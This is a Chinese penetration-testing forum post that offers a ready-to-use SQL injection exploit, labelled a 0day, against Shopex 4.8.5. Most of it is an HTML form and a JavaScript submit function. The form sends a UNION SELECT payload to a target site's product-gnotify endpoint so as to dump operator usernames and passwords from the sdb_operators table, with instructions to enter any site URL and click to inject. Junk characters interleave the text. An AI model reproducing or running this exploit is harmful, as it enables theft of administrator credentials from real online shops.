中国网络渗透测试联盟
标题:
Shopex 4.8.5 SQL Injection Exp 0day
[打印本页]
作者:
admin
时间:
2013-1-23 09:20
标题:
Shopex 4.8.5 SQL Injection Exp 0day
<center>
L E3 P+ F- b/ {: R0 J# z
<title>中国网络渗透测评联盟-中测联盟|-Shopex 4.8.5 SQL Injection Exp 在线版</title>
) |5 @- c# D( a+ E9 P2 u
<form action="" method="post" name="submit_url">
! N9 v9 T H* K3 @( C, X
网址:<input type=text name=url value="http://www.political-security.com/" size=62><br><br>
3 E" `, ]. @/ }$ U. P7 }# m$ }
<input type="hidden" name="goods[goods_id]" value="3">
& `2 N. K& @* ?: C, F8 g2 S o
<input type="hidden" name="goods[product_id]" value="1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators">
2 t8 k) F( W3 N+ ^7 g+ ?1 s
<input type="submit" value="给我注入" onclick=fsubmit()>
% ~) A* s! e! T# F
</form> <br /><br />填上你要注入的网址(注意要打上http:// 要不跳转不了) 点“给我注入”就要以了。//www.political-security.com
8 X( D) z. l' ^) P5 j
+ ?4 g$ Y. B6 W& j4 \
<script>
( c P- }5 A% [% e
function fsubmit(){
& K+ T! I% x0 @) }
form = document.forms[0];
; X$ S+ F( p4 E: \ l8 v) r7 \
form.action = form.url.value+'/?product-gnotify';
$ T' n% N, m3 p7 v" k- j
form.submit();
- ?' @: Z8 d* S& A
}
6 e) e" I9 r- w
</script>
9 Z9 ]) q) x% j" z; H, K u4 g
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2